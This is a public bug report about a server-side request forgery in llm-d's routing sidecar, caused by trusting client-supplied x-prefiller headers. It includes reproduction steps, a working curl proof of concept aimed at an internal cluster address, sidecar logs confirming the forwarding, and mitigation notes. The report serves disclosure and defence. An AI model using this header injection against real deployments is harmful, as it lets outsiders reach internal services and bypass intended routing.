Potential SSRF via `x-prefiller-url` or `x-prefiller-host-port` header

## Disclaimer

The project is new and I have not found a documented responsible disclosure process (see https://llm-d.ai/docs/community/contribute#security). I'm therefore filing a public issue, in the hope that most users are still only experimenting with llm-d and that production setups are not affected.

## Problem

There is a potential for Server-Side Request Forgery (SSRF).

The routing sidecar honors the `x-prefiller-url` and `x-prefiller-host-port` headers. However, I'd expect the scheduler or the Gateway (at least) not to pass these headers through when they arrive on external, user-provided requests.

This allows a malicious external user to craft a request that forces the sidecar to forward the prefill stage of the request to an arbitrary URL or host:port. This bypasses the intended routing logic managed by the scheduler.

## To Reproduce

1. Deploy a model fronted by the Gateway and the inference scheduler on a cluster (e.g., KinD).
2. Send a POST request to the model's inference endpoint via the gateway.
3. In the request, include the header `x-prefiller-url` pointing to an arbitrary internal service address.
4. Observe that the request is successfully processed by the unintended service.

## Example curl command

The following command was sent to the gateway at `172.18.0.3`. It includes the `x-prefiller-url` header, which points to an arbitrary internal address, `http://10.244.0.51:8000`. The request succeeds with a 200 OK status, indicating that the sidecar forwarded the request as instructed by the header.

```bash
curl -v -XPOST \
-H "x-prefiller-url: http://10.244.0.51:8000" \
-H "Content-Type: application/json" \
-d '{"model": "facebook/opt-125m", "prompt": "Write a poem about colors...", "stream": false, "max_tokens": 400}' \
http://172.18.0.3/default/facebook-opt-125m-pd/v1/completions
```

The sidecar then logs lines like these:

```
I0703 09:55:11.606604       1 chat_completions.go:310] "sending request to prefiller" logger="proxy server" url="http://10.244.0.51:8000/" body="{\"do_remote_decode\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"stream\":false}"
I0703 09:55:12.898331       1 chat_completions.go:334] "warning: missing 'remote_block_ids' field in prefiller response" logger="proxy server"
I0703 09:55:12.898347       1 chat_completions.go:340] "warning: missing 'remote_engine_id' field in prefiller response" logger="proxy server"
I0703 09:55:12.898351       1 chat_completions.go:346] "warning: missing 'remote_host' field in prefiller response" logger="proxy server"
I0703 09:55:12.898355       1 chat_completions.go:352] "warning: missing 'remote_port' field in prefiller response" logger="proxy server"
I0703 09:55:12.898361       1 chat_completions.go:355] "received prefiller response" logger="proxy server" remote_block_ids=null remote_engine_id=null remote_host=null remote_port=null
I0703 09:55:12.898389       1 chat_completions.go:393] "sending request to decoder" logger="proxy server" body="{\"do_remote_prefill\":true,\"max_tokens\":400,\"model\":\"facebook/opt-125m\",\"prompt\":\"Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, Write a poem about colors, a very long one please\",\"remote_block_ids\":null,\"remote_engine_id\":null,\"remote_host\":null,\"remote_port\":null,\"stream\":false}"
```

## Notes

- An egress network policy can mitigate the issue for both external and cluster-internal traffic. However, it is not simple to configure out of the box, because vLLM needs to connect to Hugging Face (and possibly other hosts) to download the model(s).
- It is unclear whether an HTTPRoute filter that removes the header would mitigate the issue **and** leave the P/D functionality intact, since filters are applied before the "action" (I'm not sure what that means in the context of InferencePool and ExtProc).
